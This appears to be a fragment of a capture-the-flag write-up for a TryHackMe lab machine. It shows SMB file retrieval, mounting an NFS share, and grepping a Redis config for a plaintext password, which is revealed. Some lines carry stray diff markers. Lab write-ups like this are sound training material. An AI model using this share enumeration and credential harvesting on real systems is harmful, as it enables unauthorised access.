PankajSharma1217/THMBox/Internal-Vulnnet.md

                 11309648 blocks of size 1024.
 3277360 blocks available
 smb: \temp\> get services.txt
 getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

+┌──(mikey㉿kali)-[~/rabbit]
+└─$ sudo mount -t nfs 10.10.40.193:  /tmp

+ ──(mikey㉿kali)-[/tmp/opt/conf/redis]
+└─$ cat redis.conf | grep -i password
+# 2) No password is configured.
+# If the master is password protected (using the "requirepass" configuration
+# masterauth <master-password>
+# Require clients to issue AUTH <PASSWORD> before processing any other
+# 150k passwords per second against a good box.
+This means that you should
+# use a very strong password otherwise it will be very easy to break.

 requirepass "B65Hx562F@ggAZ@F"
 masterauth <master-password>